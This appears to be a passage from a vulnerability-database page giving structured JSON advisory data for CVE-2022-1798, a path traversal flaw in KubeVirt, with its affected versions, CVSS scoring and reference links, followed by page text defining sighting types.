          "pubdate": "2022-08-18",
          "solution": "Unfortunately, there is no solution available yet.",
          "title": "Relative Path Traversal",
          "urls": [
            "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm",
            "https://github.com/advisories/GHSA-cvx8-ppmc-78hm"
          ],
          "uuid": "815806e6-b8e2-4abd-8822-0be903839c27"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
                "cpe_name": [],
                "versionEndExcluding": "0.55.1",
                "versionStartIncluding": "0.20.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security@google.com",
          "ID": "CVE-2022-1798"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-22"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Mitigation",
                "Patch",
                "Third Party Advisory"
              ],
              "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          "exploitabilityScore": 2.0,
          "impactScore": 4.0
        }
      },
      "lastModifiedDate": "2022-09-19T18:52Z",
      "publishedDate": "2022-09-15T16:15Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2022-1798 (GCVE-0-2022-1798)

FKIE_CVE-2022-1798

GHSA-CVX8-PPMC-78HM

Duplicate Advisory

Original Description

GSD-2022-1798

Tags

Sightings

Nomenclature